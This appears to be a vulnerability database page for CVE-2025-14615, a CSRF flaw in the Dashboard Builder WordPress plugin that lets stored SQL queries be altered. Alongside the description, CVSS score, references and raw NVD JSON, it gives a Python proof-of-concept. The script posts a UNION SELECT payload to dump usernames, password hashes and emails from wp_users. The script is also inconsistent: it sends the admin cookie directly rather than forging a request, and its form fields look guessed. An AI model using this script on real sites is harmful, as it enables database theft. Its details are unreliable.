CVE-2025-14615

Description

The DASHBOARD BUILDER – WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. This makes it possible for unauthenticated attackers to modify the stored SQL query and database credentials used by the [show-dashboardbuilder] shortcode via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The modified SQL query is subsequently executed on the front-end when the shortcode is rendered, enabling arbitrary SQL injection and data exfiltration through the publicly visible chart output.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Dashboard Builder WordPress插件 1.5.7及以下所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys
from urllib.parse import urlencode

# CVE-2025-14615 PoC - CSRF to SQL Injection in Dashboard Builder WordPress Plugin
# This PoC demonstrates how an attacker can exploit missing CSRF protection
# to inject malicious SQL queries via the settings handler

TARGET_URL = "http://target-wordpress-site.com"
ADMIN_COOKIE = "wordpress_logged_in_cookie_here"

def create_csrf_payload():
    """
    Generate malicious request to modify SQL query in dashboard builder settings.
    The injected SQL can be used to exfiltrate data from the database.
    """
    # Malicious SQL injection payload
    # This payload attempts to extract user credentials from wp_users table
    malicious_sql = "UNION SELECT 1,user_login,user_pass,user_email,5,6,7,8,9,10 FROM wp_users--"
    
    payload = {
        'action': 'dashboard_builder_save_settings',
        'db_host': 'localhost',
        'db_name': 'wordpress_db',
        'db_user': 'wp_user',
        'db_pass': 'password',
        'sql_query': malicious_sql,
        'nonce': ''  # Missing nonce validation allows CSRF attack
    }
    return payload

def exploit_csrf():
    """
    Send CSRF attack to modify dashboard builder settings.
    Requires admin interaction (tricking admin into clicking link).
    """
    admin_url = f"{TARGET_URL}/wp-admin/admin.php?page=dashboard-builder-settings"
    
    headers = {
        'Cookie': ADMIN_COOKIE,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    payload = create_csrf_payload()
    
    print("[*] Sending CSRF payload to modify dashboard builder settings...")
    print(f"[*] Target: {admin_url}")
    print(f"[*] Payload: {payload['sql_query']}")
    
    try:
        response = requests.post(
            admin_url,
            data=payload,
            headers=headers,
            timeout=30
        )
        print(f"[+] Response Status: {response.status_code}")
        if response.status_code == 200:
            print("[+] Settings modified successfully - SQL injection payload stored")
            print("[*] Visit page with [show-dashboardbuilder] shortcode to trigger injection")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    print("="*60)
    print("CVE-2025-14615 - Dashboard Builder CSRF to SQL Injection")
    print("="*60)
    exploit_csrf()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14615
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14615
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14615/
[4] VulDB https://vuldb.com/cve/CVE-2025-14615
[5] https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder-admin.php#L158
[6] https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder.php#L51
[7] https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder-admin.php#L158
[8] https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder.php#L51
[9] https://www.wordfence.com/threat-intel/vulnerabilities/id/106b31ed-d509-4551-a134-02193ab22fe1?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14615", "sourceIdentifier": "[email protected]", "published": "2026-01-14T06:15:53.050", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The DASHBOARD BUILDER – WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. This makes it possible for unauthenticated attackers to modify the stored SQL query and database credentials used by the [show-dashboardbuilder] shortcode via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The modified SQL query is subsequently executed on the front-end when the shortcode is rendered, enabling arbitrary SQL injection and data exfiltration through the publicly visible chart output."}, {"lang": "es", "value": "El plugin de WordPress DASHBOARD BUILDER – plugin para Gráficos y Cuadros es vulnerable a falsificación de petición en sitios cruzados en todas las versiones hasta la 1.5.7, inclusive. Esto se debe a la falta de validación de nonce en el manejador de configuraciones en dashboardbuilder-admin.php. Esto hace posible que atacantes no autenticados modifiquen la consulta SQL almacenada y las credenciales de la base de datos utilizadas por el shortcode [show-dashboardbuilder] a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace. La consulta SQL modificada se ejecuta posteriormente en el front-end cuando se renderiza el shortcode, lo que permite la inyección SQL arbitraria y la exfiltración de datos a través de la salida del gráfico visible públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder-admin.php#L158", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder.php#L51", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder-admin.php#L158", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder.php#L51", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/106b31ed-d509-4551-a134-02193ab22fe1?source=cve", "source": "[email protected]"}]}}